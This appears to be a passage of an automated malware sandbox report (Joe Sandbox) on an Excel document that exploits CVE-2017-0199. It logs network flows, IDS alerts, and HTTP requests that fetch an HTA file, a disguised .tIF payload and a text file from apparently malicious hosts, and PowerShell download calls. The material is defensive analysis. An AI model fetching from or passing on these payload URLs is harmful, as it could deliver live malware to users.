Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.12:80 -> 192.168.2.22:49166
Source: Network traffic Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.12:80 -> 192.168.2.22:49164
Source: Network traffic Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 172.245.123.12:80
Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49168
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /361/TELNERA.txt HTTP/1.1Host: 172.245.123.12Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HUMBER-COLLEGECA HUMBER-COLLEGECA
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 172.245.123.12:80
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 172.245.123.12:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /361/sen/seemebestgoodluckthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.12Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /361/sen/seemebestgoodluckthings.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=9228-Connection: Keep-AliveHost: 172.245.123.12If-Range: "26f35-6283fd0da12d9"
Source: global traffic HTTP traffic detected: GET /361/seemebestthingsentirelifegivenbackwithgood.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.12Connection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE899A7018 URLDownloadToFileW, 8_2_000007FE899A7018
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC3D3040.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /361/sen/seemebestgoodluckthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.12Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /361/sen/seemebestgoodluckthings.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=9228-Connection: Keep-AliveHost: 172.245.123.12If-Range: "26f35-6283fd0da12d9"
Source: global traffic HTTP traffic detected: GET /361/seemebestthingsentirelifegivenbackwithgood.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.12Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /361/TELNERA.txt HTTP/1.1Host: 172.245.123.12Connection: Keep-Alive
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: linkjago.me
Source: global traffic DNS traffic detected: DNS query: 1016.filemail.com
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/
Source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/seemeb
Source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF
Source: powershell.exe, 00000008.00000002.512506171.000000001A7EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF89
Source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFp
Source: mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.hta
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.hta-
